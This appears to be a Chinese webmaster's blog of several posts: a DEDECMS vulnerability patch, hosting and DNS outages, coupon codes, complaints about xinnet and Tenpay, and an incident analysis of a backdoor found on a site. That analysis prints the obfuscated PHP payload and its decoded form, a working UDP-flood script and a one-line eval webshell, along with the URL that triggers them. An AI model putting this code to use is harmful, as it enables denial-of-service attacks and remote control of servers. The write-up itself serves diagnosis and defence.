默默鸟第二季

DEDECMS再爆严重安全漏洞，不用后台帐号密码，即可登录网站后台。

解决办法：

找到include/common.inc.php文件，把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$_k) )
{
exit(‘Request var not allow!’);
}
}

换成

//检查和注册外部提交的变量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$val) )
{
exit(‘Request var not allow!’);
}
}
}
CheckRequest($_REQUEST);

具体入侵步骤不再说了。使用dedecms，一定要修改后台路径，看到后台提示有新补丁，及时更新即可。

PS：柏拉图走后 dede真的不行了，为了您网站的长远发展，建议及时更换程序。

下午刚搬了个站去DH，这晚上可就打不开了，IP ping不通。 让外边的MJJ看试试，可以通，难道被GFW和谐啊，可不敢。。。DH放好多站了。。。

进dreamhost的控制面板 也打不开，ping下，竟然也和谐了。

www主页竟然也和谐，崩溃，这下要死多少网站啊！测试了几个DH的站，有几个IP还是漏网的。。。天朝啊 要打击就打击干净，别让几家欢喜几家愁的。。。

烦死你鸟爷了~

白天看看，不行得大批量搬家了~~~

————————————–

核实：北方联通大批量屏蔽美国IP. 电信和南方联通表示淡定.

photonvps 支持支付宝付款，支持win/linux操作系统的VPS。

HALFOFF 首月半价，以后续费原价。
TENOFF 终身九折，仅限月付使用。

优惠码使用地址：http://www.photonvps.com/

事件：win2003遭受udp攻击,网络带宽占用大，导致网络堵塞。服务器瘫痪。

服务器带宽应用占到80-100%，网络堵塞，网站无法访问，连系统自带远程控制也连接不上！

分析：

⒈通过服务器“本地连接状态”可以看到，发送的字节增长速度很快（几乎10m/s），收到的字节很少！

在cmd 里用 netstat -an 查看到服务器连接的都是同一个ip ，端口都是连续的 。

根据这个可以判定不是DDOS攻击，因为DDOS是不断收到大量数据包。

⒉关闭iis，带宽过一会就正常， 可以判定是网站导致的！然后一个个网站排查（从来没有见过这样的情况，通过页面调用往外发包的）！

查找：DEDECMS的plus目录下有一个lndex.php 访问地址为/plus/lndex.php?ip=XXX.XXX.XXX.XXX&port=80&time=600

.index.php代码为

<?php
/*
gl

*/
eval(gzinflate(base64_decode(’
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/’)));

 

复制代码

破解的代码为

<?php

$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \”Flooded: $ip on port $rand <br><br>\”;
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= \”X\”;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\”udp://$ip\”, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \”Packet complete at \”.time(\’h:i:s\’).\” with $packets (\” . round(($packets*65)/1024, 2) . \” mB) packets averaging \”. round($packets/$exec_time, 2) . \” packets/s \\n\”;
?>
<?php eval($_POST[ddos])?>

 

也就是说只要访问网站的/plus/lndex.php?ip=xx.xx.xx.xx&port=80&time=600 就会UDP攻击xx.xx.xx.xx

修复DEDECMS漏洞 php.ini 修改allow_url_fopen = Off

在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS

如果还不行，就去买个防火墙吧！

帝国备份王忘记后台登录密码怎么办？

解决方法：用记事本打开class/config.php文件，找到“$set_password”，把它的值改为“e10adc3949ba59abbe56e057f20f883e”，密码就是：123456

一大早就接到客户电话说网站打不开，说域名错误，赶紧起来看看。。。ping不到数值，到ename查dns发现打不开，汗 又挂了，另外些在琥珀也打不开，崩溃！

要挂一起挂啊。。。要死掉啦~

ename比较捣蛋，自己主站用的不是ename.net的DNS，还能打开。

琥珀就不行啦，主站也打不开了 哈~ 对自己产品太有信心了。。。

ename还能打电话过去发发牢骚，琥珀强大的 联系电话都是个图片！

我真要疯了！

会不会是dnspod干的?! 哈 不敢想~

——————————————————
琥珀竟然先恢复了…ename还没好 (上午10点)

易名中国ename的DNS貌似服务器挂掉了，发博纪念下。。。

好多网站打不开了，现场报道。

QQ聊天窗口发出来的网址有些是X号不能直接打开。

这时候可以到QQ安全中心提交申请。

通过QQ安全中心进行站长申诉(http://aq.qq.com/cn/site_appeal/site_appeal_index)，如果你的网址符合条件，即可将申诉网址加入到信任网址中。

今天有个朋友要香港linux空间，还要国内知名品牌。。。
额 万网没有~ 新一代有，这个月还促销，就是续费比现在的价格贵，他怕到时候没法跟老板交差。

转了半天 想起来不还有新网嘛~ 这么老的牌子，哥又是代理，平常就做域名了（现在域名也贵的没法做）。

就满怀希望的叫朋友打了400，我入了进去，开了个香港L500.

开通后发现给的控制面板竟然是废弃了1年之久的 cp2.xinnet.com

额。。。问了专员说 linux主机仍然在用这个半残面板。
哦 就这也行吧 反正09年以前都一直用这个，人家都用咱也用吧。

这个界面和功能在5年前应该算是很前进的。

进去了想先进phpmyadmin看看mysql，点击一看 额 怎么空白？
直接输入地址，也是提示没数据库，没登陆的地方。。。
（中间电话沟通才知道要自己解析个mysql二级米过去，哇跟DH一样先进啊。也许就这一点牛B了）

再看其他功能
点多域名绑定

该功能只有下面几种类型支持:
基础W200
强效W500
基础W200
强效W500
基础W200
强效W500
哦 这些都是win主机的类型额。。。哦 想起来了 这个面板以前win系统也用的，linux不支持。。。算了 虽然只能绑一个带www的，不带www的新网现在也不让转发了，等于废了，额 废就废了吧~ 朋友也不计较了。。。

NEXT 反馈单
还能在线提交反馈吗？比万网帅呀！！！哇哇
点不开 汗 摆设。。额 也许曾经能用。

没看到有在线解压，有一个webftp，进去看看

额。。。估计也是给WIN主机用的，现在也是摆设。

额。。。还剩什么？修改FTP密码我还真没试~ 如果可以改，那就一个FTP密码修改功能可以用，昂~ 真是大牌公司的产品。。。简洁~

朋友用的php168 sharp 需要path_info支持，额 传完安装，提示不支持。。。
天呐~ 焦虑~ 到P8论坛看看 原来用.htaccess 写个东西可以弥补。
窃喜 嘿嘿~~~

传上去了 怎么还不行呢？ 再次焦虑啊。。。问专员他也不懂，额 看来是半路出家的。

到代理的后台提交技术支持吧，早上10点提交的截至目前晚上7点没见回复。

额 等不及了 打电话吧。。。第一个客服说：“我处理不了，我提交给技术处理吧”

等待……

还是不行 没人叼我呢？ 再打过去。。。

呀 这个小伙懂~ 但被告知不支持！
啊 linux主机不支持 .htaccess ? 啥？！ 不支持！
不支持。。。。。。。。。。

汗 还有linux主机连这个都不支持？ 大哥给整整呗~ “整不了”

呜呼~ 彻底没法用了。。。 咋办 哥 能给退了不？ “这个请联系分公司的”

额。。。联系联系。。。 “退不了” （就是！好不容易逮着一个怎么会给你退~，平常喊广告 喊促销，喊死你都不买，这会自己送上门了 还能叫你跑掉了？）

额 那你给我置换下呗~ 算了下 一个香港L500能换7个半的基础W100了。

这W100，我自己用也差不多能用完了~给换换呗~
“等我问问总公司” 额 等吧

不到5点就去问了，到现在…… 中间见他下线了，打电话过去问，他说公司全都上不了网了。。。等会看看吧~

我再等。7点了 哥~ 我还没吃饭呢 饿着呢~ 打电话过去 额，估计下班了没人接。。。 天呐~ 你要不给我退，又不给我换。。。我这400大洋不是打水漂了~

明天再联系看~

新网LINUX主机没法用，绝对的！不建议地球人使用！

前年就申请了财付通的企业版商户，做了在线支付，今年初时候看财付通有活动，新注册帐号一个月内在线支付满10元就可以免费获得腾讯的企业QQ，在极大的诱惑下，又重新申请了个新号。

申请过的第二天就立刻入了11进去，哈哈。然后等他啥时候发奖品呢？

过了两周了 还没信儿~ 就打电话问，他们说在整理符合要求的商户，整理完就发。

我想是不是就弄个11太假了，然后就给主站的接口改用这个新的帐号，老号提现过后貌似还剩20多。

就这样一直用，用到都结算一次了（又过了快两周吧），还不见有动静，我就又打电话去问，额。。。他们竟然说奖品已经发完了。。。暴汗！！！

哎。。。没就没了吧。。现在财付通又搞个认证域名，我想着几个站同时用呢，给这些站都整理下，用一个号吧，整理完让财付通的小姑娘给添加了，然后老号闲着也闲着，我就顺便说了下，给我老号注销吧。。。她说OK，已经提交上去了。

注：我里边还有20多，想着没多少，估计给我号注销时候，钱就打我银行卡了吧。

等了两天，傍晚时候接到财付通电话说，已经注销成功了。

嗯。。。上号看下 确实登陆不进去了，再看下结算的银行卡，额。。。怎么没钱进来呢。。。啊！删号带钱一起删了啊。。。我晕 这是什么东西啊！！！

汗。。。。。我真是崩溃呀！

就20多 也不说了，就发个牢骚。。。哎 什么办事态度！！！